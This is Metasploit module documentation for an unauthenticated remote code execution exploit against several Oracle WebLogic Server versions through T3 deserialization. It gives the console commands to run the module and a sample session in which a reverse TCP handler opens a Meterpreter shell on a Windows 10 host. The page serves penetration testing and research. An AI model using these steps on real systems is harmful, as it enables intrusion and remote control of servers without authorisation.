metasploit-gs/documentation/modules/exploit/windows/misc/weblogic_deserialize.md

Description

Oracle Weblogic Server v10.3.6.0, v12.1.3.0, v12.2.1.2, and v12.2.1.3 are vulnerable to a deserialization vulnerable, which can be used to execute code on vulnerable systems. An unauthenticated user with network access via T3 could exploit the vulnerability. This module has been tested against Oracle Weblogic Server v10.3.6.0 running on Windows10 x64 using JDK v7u17.

Vulnerable Application

Oracle Weblogic Server v10.3.6.0, v12.1.3.0, v12.2.1.2, and v12.2.1.3.

Verification Steps

1. ./msfconsole -q
2. use exploit/multi/misc/weblogic_deserialize
3. set rhosts <rhost>
4. set srvhost <srvhos>t
5. set srvport <srvport>
6. run

Scenarios

Tested on Windows 10 x64 running Oracle Weblogic Server 10.3.6.0 on JDK v7u17

msf5 exploit(multi/misc/weblogic_deserialize) > set rhosts 172.22.222.175
rhosts => 172.22.222.175
msf5 exploit(multi/misc/weblogic_deserialize) > set srvhost 172.22.222.121
srvhost => 172.22.222.121
msf5 exploit(multi/misc/weblogic_deserialize) > set srvport 8888
srvport => 8888
msf5 exploit(multi/misc/weblogic_deserialize) > run
[*] Exploit running as background job 0.
msf5 exploit(multi/misc/weblogic_deserialize) > 
[*] Started reverse TCP handler on 172.22.222.121:4444 
[*] Sending stage (179779 bytes) to 172.22.222.175
[*] Meterpreter session 1 opened (172.22.222.121:4444 -> 172.22.222.175:49908) at 2018-08-08 17:53:07 -0500
sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : _
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >